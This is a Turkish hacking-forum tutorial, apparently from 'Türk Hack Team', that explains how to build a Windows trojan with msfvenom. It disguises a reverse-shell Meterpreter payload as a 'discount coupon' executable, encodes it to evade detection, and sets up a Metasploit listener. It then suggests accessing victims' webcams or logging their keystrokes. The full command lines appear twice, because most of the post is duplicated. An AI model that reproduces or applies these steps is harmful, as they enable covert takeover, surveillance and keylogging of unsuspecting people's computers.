Merhaba değerli "Türk Hack Team" ailesi bu yazımda sizlere ****sploit ten trojan oluşturmayı anlatacağım öncelikle githubtan ****sploiti uç birim sayesinde kurmalısınız sonrasında Port açmak lazım port açmakta biraz sıkıntı vardır ondan dolayı duck dns sayesinde port olayını çözmeliyiz
PORT:Kanal demektir port ile pc ile virüs arasındaki bağlantıdır port olmazsa bağlantı olmaz yaptığınız trojan sadece hedef pc de kalır.
Aşağıda verdiğim harfler ve anlamları önemlidir dikkatlice okuyunuz!
f = Kaydedilecek dosya formatı. msfvenom -f çıktı formatı
-a = Oluşturulacak payloadun mimarisini belirler. Msfvenom -a mimari
--platform = Dosyanın çalışacağı platformu belirler. msfvenom --platform çalışacağı platform"
-o = Payloadun nereye çıkarılacağını belirtir. msfvenom -o çıkarılacak dizi"
-e = Encoder seçimini belirtir. msfvenom -e encoder adı
-i = İterasyon sayısını belirler yani encoding işleminin kaç kere tekrarlanacağını bildirir. "msfvenom -i 20"
-b = Kötü karakterleri (bad characters) temizler. msfvenom -b \x00\xff
-x = Oluşturulacak payloadun bir dosya ile birleştirileceğini belirtir. msfvenom -x birleştirilecek dosyanın adı veya yolu
-k = Birleştirilen dosyanın fonksiyonlarının bozulmasını engelle msfvenom -k
-c = Birleştirilecek Shell codeu belirler. msfvenom -c Shell code dizini
Şimdi eğer parametreleri öğrendiysek gelelim trojan oluşturmaya.
1-Konsolu açıyoruz.
2-Konsola msfvenom ile msfvenom parametrelerini kullanarak bir trojan oluşturuyoruz.Ben şimdilik şöyle bir trojan oluşturacağız.
###YAZILAN İP, PORT TEMSİLİDİR SİZ KENDİ BİLGİLERİNİZİ GİRECEKSİNİZ.###
##ÖRNEK##msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=443 -f exe -a x86 -o /root/Masaüstü/indirimkuponu.exe --platform windows -e x86/shikata_ga_nai -i 20--
&&Bu demek oluyorki dosyamızı msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=443 -f exe -a x86 -o /root/Masaüstü/indirimkuponu.exe --platform windows -e x86/shikata_ga_nai -i 20 komutu ile oluşturduk. Buna göre 192.168.1.6 IP adresinin 443 portuna geri dönüş yapacak, x86 platformda çalışacak, shikata_ga_nai encoderını kullanan, 20 defa encoding işlemi yapan bir exe dosyası hazırlamış olduk. Yani 20 defa üst üste şifreledik.
Trojanı oluşturduk sıra geldi dinlemeye
Başka bir konsol açıp msfconsole komutunu yazarak ****sploit konsolunu çalıştırıyoruz. Ardından listen moda geçmek için aşağıdaki tabloda yer alan komutları sırası ile yazacağız.Komutları öğrenelim ilk önce
use exploit/multi/handler = Gelen bağlantıları dinleyecek handlerımızı belirtiyoruz.
set PAYLOAD windows/meterpreter/reverse_tcp = Bize ters bağlantı (reverse connection) kuracak olan payloadumuzu ayarlıyoruz.
set LHOST 192.168.126.141 = Gelen bağlantıları kabul edecek IP adresimizi belirtiyoruz.
set LPORT 443 = 443üncü porta gelen bağlantıları dinleyeceğimizi ve bu bağlantıları kabul edeceğimizi belirtiyoruz.
Herşey olduktan sonra run komutu ile başlatıyoruz şimdi dinlemeye aldık dinlemede iken eğer birisi trojanı açarsa port sayesinde ekranımıza ipi si düşecektir gelen daveti kabul etmek için session komutunu kullanıyoruz bu sayede kabul etmiş oluyoruz bundan sonrası size kalmış ister gidin kamerasına girin ister klavye takibi yapın sizin tercihiniz
####ÖNEMLİ UYARI####
Yaptığınız faaliyetlerden başta Türk Hack Team yönetimi olmak üzere Şahsım dahil kimse sorumlu değildir.
##EĞER TAKILDIĞINIZ NOKTA OLURSA SORABİLİRSİNİZ##
PORT:Kanal demektir port ile pc ile virüs arasındaki bağlantıdır port olmazsa bağlantı olmaz yaptığınız trojan sadece hedef pc de kalır.
Aşağıda verdiğim harfler ve anlamları önemlidir dikkatlice okuyunuz!
f = Kaydedilecek dosya formatı. msfvenom -f çıktı formatı
-a = Oluşturulacak payloadun mimarisini belirler. Msfvenom -a mimari
--platform = Dosyanın çalışacağı platformu belirler. msfvenom --platform çalışacağı platform"
-o = Payloadun nereye çıkarılacağını belirtir. msfvenom -o çıkarılacak dizi"
-e = Encoder seçimini belirtir. msfvenom -e encoder adı
-i = İterasyon sayısını belirler yani encoding işleminin kaç kere tekrarlanacağını bildirir. "msfvenom -i 20"
-b = Kötü karakterleri (bad characters) temizler. msfvenom -b \x00\xff
-x = Oluşturulacak payloadun bir dosya ile birleştirileceğini belirtir. msfvenom -x birleştirilecek dosyanın adı veya yolu
-k = Birleştirilen dosyanın fonksiyonlarının bozulmasını engelle msfvenom -k
-c = Birleştirilecek Shell codeu belirler. msfvenom -c Shell code dizini
Şimdi eğer parametreleri öğrendiysek gelelim trojan oluşturmaya.
1-Konsolu açıyoruz.
2-Konsola msfvenom ile msfvenom parametrelerini kullanarak bir trojan oluşturuyoruz.Ben şimdilik şöyle bir trojan oluşturacağız.
###YAZILAN İP, PORT TEMSİLİDİR SİZ KENDİ BİLGİLERİNİZİ GİRECEKSİNİZ.###
##ÖRNEK##msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=443 -f exe -a x86 -o /root/Masaüstü/indirimkuponu.exe --platform windows -e x86/shikata_ga_nai -i 20--
&&Bu demek oluyorki dosyamızı msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=443 -f exe -a x86 -o /root/Masaüstü/indirimkuponu.exe --platform windows -e x86/shikata_ga_nai -i 20 komutu ile oluşturduk. Buna göre 192.168.1.6 IP adresinin 443 portuna geri dönüş yapacak, x86 platformda çalışacak, shikata_ga_nai encoderını kullanan, 20 defa encoding işlemi yapan bir exe dosyası hazırlamış olduk. Yani 20 defa üst üste şifreledik.
Trojanı oluşturduk sıra geldi dinlemeye
Başka bir konsol açıp msfconsole komutunu yazarak ****sploit konsolunu çalıştırıyoruz. Ardından listen moda geçmek için aşağıdaki tabloda yer alan komutları sırası ile yazacağız.Komutları öğrenelim ilk önce
use exploit/multi/handler = Gelen bağlantıları dinleyecek handlerımızı belirtiyoruz.
set PAYLOAD windows/meterpreter/reverse_tcp = Bize ters bağlantı (reverse connection) kuracak olan payloadumuzu ayarlıyoruz.
set LHOST 192.168.126.141 = Gelen bağlantıları kabul edecek IP adresimizi belirtiyoruz.
set LPORT 443 = 443üncü porta gelen bağlantıları dinleyeceğimizi ve bu bağlantıları kabul edeceğimizi belirtiyoruz.
Herşey olduktan sonra run komutu ile başlatıyoruz şimdi dinlemeye aldık dinlemede iken eğer birisi trojanı açarsa port sayesinde ekranımıza ipi si düşecektir gelen daveti kabul etmek için session komutunu kullanıyoruz bu sayede kabul etmiş oluyoruz bundan sonrası size kalmış ister gidin kamerasına girin ister klavye takibi yapın sizin tercihiniz
####ÖNEMLİ UYARI####
Yaptığınız faaliyetlerden başta Türk Hack Team yönetimi olmak üzere Şahsım dahil kimse sorumlu değildir.
##EĞER TAKILDIĞINIZ NOKTA OLURSA SORABİLİRSİNİZ##